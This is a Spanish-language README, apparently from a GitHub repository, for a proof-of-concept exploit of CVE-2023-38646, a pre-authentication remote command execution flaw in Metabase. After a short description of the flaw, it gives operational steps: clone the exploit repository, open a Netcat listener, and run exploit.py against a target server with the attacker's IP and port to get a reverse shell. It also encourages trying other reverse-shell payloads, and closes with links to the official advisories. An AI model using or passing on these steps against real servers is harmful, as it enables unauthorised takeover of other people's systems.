
Este es un script de Prueba de Concepto (PoC) para explotar Metabase, una herramienta de inteligencia empresarial y análisis de datos de código abierto.
Este es un script de Prueba de Concepto (PoC) para explotar Metabase, una herramienta de inteligencia empresarial y análisis de datos de código abierto. Metabase permite a los usuarios visualizar e interactuar con sus datos, lo que la convierte en una potente plataforma para el análisis de datos.
Esta vulnerabilidad, designada como CVE-2023-38646, permitía a los atacantes ejecutar comandos arbitrarios en el servidor sin requerir autenticación alguna. El impacto de este fallo fue grave, ya que otorgaba acceso no autorizado al servidor con el nivel de privilegios del propio servidor.
Clona este repositorio
git clone https://github.com/threatHNTR/CVE-2023-38646.git
Navega al repositorio
cd CVE-2023-38646
Antes de ejecutar el script, configura un listener de Netcat
nc -nlvp chosen-port
Ejecuta el script
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
Explotación: el script intentará enviar una reverse shell al servidor Metabase objetivo. Si tiene éxito, recibirás una shell en tu máquina. No dudes en cambiar el payload para probar diferentes reverse shells.
GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
Metabase Advisory: https://www.metabase.com/blog/security-advisory
Metabase GitHub: https://github.com/metabase/metabase
Assetnote Blog - Encadenando vulnerabilidades hasta lograr un RCE sin autenticación en Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/